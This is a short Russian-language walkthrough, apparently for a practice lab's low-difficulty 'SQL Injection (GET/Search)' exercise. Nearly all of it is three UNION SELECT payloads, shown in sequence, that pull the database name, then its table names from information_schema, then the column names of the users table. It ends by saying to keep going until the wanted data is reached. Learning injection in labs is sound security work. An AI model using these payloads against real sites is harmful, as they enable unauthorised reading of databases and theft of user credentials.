Перейти к основному содержимому

SQL Injection (GET/Search)

(low)

Используем строку

asd' UNION SELECT NULL,database(),NULL,NULL,NULL,NULL,NULL-- -

чтобы вывести название базы

теперь используем строку

asd' UNION SELECT NULL,table_name,NULL,NULL,NULL,NULL,NULL from information_schema.tables where table_schema=database()-- -

чтобы узнать, какие в базе есть такблицы

нас интересует users, поэтому используем следующую строку

asd' UNION SELECT NULL,column_name,NULL,NULL,NULL,NULL,NULL from information_schema.columns where table_name='users'-- -

чтобы получить список пользователей

в таком темпе можно продолжать пока не получим интересующую информацию